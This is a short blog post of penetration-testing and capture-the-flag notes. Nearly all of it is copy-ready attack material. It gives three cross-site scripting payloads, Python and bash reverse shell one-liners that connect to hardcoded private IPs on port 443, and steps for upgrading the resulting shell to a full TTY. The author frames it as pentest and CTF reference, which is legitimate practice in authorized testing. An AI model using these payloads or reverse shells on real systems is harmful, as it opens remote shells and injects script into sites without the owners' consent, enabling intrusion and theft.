Post

Payloads and Notes

Posted Updated
By Luan Simões 1 min read

Payloads and Notes

Information that I found useful during pentests or ctf’s

Payloads

XSS

1
2
3

<p ondragend=[1].map(prompt) draggable="true">dragMe</p>
<img/src=x onerror=prompt(1)>
<svg onload=alert(1)<

Reverse Shells

1
2
3
4
5

#Python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

#Bash
bash -c '/bin/bash -i >& /dev/tcp/10.9.34.191/443 0>&1'

TTY Treatment

1
2
3
4
5
6

script /dev/null -c bash
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
Hacking, Notes, Web Exploitation
hacking payloads post exploitation
This post is licensed under CC BY 4.0 by the author.